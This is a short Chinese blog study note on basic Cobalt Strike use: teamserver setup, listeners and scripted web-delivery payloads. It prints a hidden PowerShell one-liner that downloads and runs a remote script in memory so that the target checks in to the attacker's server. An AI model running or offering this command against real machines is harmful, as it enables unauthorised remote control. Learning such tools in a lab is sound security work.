【知识积累】Cobalt Strike基本操作

前言

  • Cobalt Strike基本学习

一、基础了解CS

启动CS

基本架构是C/S,所以得先启动服务器

image-20210829113459470

然后连接上去

image-20210829113533498

这是界面

image-20210829113607062

kali里面也可以使用命令启动

image-20210829114227211

让目标连接上teamserver

1、设置监听器

image-20210829115024046

image-20210829115228611

2、生成攻击载荷,在钓鱼攻击里面的脚本web传递

image-20210829115102770

①url 它是个文件路径

②就是让目标通过这个地址和端口下载恶意脚本

③目标机子运行

image-20210829115854163

得到payload

1
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.0.101:26240/a'))"

访问:26240/a路径的ip会发现有恶意代码

image-20210829120336420

这份代码就是 powershell运行 加载到内存执行

3、目标机执行payload

image-20210829120754957

接着就上线cs了

image-20210829120818237

image-20210829121110889

二、个人博客

孤桜懶契:http://gylq.gitee.io

本文标题:【知识积累】Cobalt Strike基本操作

文章作者:孤桜懶契

发布时间:2021年08月29日 - 11:33:16

最后更新:2022年05月20日 - 11:47:45

原始链接:https://gylq.gitee.io/posts/120.html

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。

-------------------本文结束 感谢您的阅读-------------------